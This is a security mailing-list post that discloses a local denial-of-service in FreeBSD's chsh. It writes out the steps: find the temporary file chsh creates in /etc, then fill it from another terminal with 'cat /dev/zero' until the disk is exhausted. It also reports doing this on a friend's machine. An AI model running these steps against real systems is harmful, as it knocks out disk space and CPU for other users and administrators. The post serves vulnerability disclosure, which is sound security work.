I found an interesting couple of related DoS to do against chsh on
FBSD. Basically chsh creates a temporary file in /etc and then
launches a user defined EDITOR. Anyways I couldn't find a way to
exploit it but I did find a way to be annoying.

tty1$ chsh

even if you just launch vi you can get the name of the temporary file
it created in /etc or just do ls.

> ls -l /etc/pw.a1MwaM
-rw------- 1 core core 330088448 Aug 15 01:44 /etc/pw.a1MwaM

Er that's after I was being annoying hehehe... filled 60G on phased
machine. Sorry phased! :D

tty2$ cat /dev/zero > /etc/pw.a1MwaM

Then go back to your vi session in chsh and :wq!... The results are
that basically root can't even remove the file while it's being
written to and of course lots of cpu overload abounds. Anyways quotas
will stop this but how many admins put user quotas on filesystems that
users aren't supposed to be writing to?

  PID USERNAME PRI NICE SIZE RES STATE TIME WCPU CPU COMMAND
14139 core 55 0 1140K 612K RUN 12:55 90.23% 90.23% chsh
14171 core 30 0 1912K 976K RUN 0:01 7.81% 2.83% top
13083 root 2 0 356K 0K nfsd 3:00 0.00% 0.00% nfsd

peace,
core

-- 
  Charles Stevenson (core) <corebokeoa.com>
  Lab Assistant, College of Eastern Utah San Juan Campus 
  http://www.bokeoa.com/~core/core.asc

-----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (GNU/Linux)

iD8DBQE9W/pVGAuLrxOyeJMRAgEOAKD0s/uzV5BaBcItdgxo1d/7Oe1gnwCfZEay xKWbW17tdXKxdifKOjyG0GE= =yBlp -----END PGP SIGNATURE-----

_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]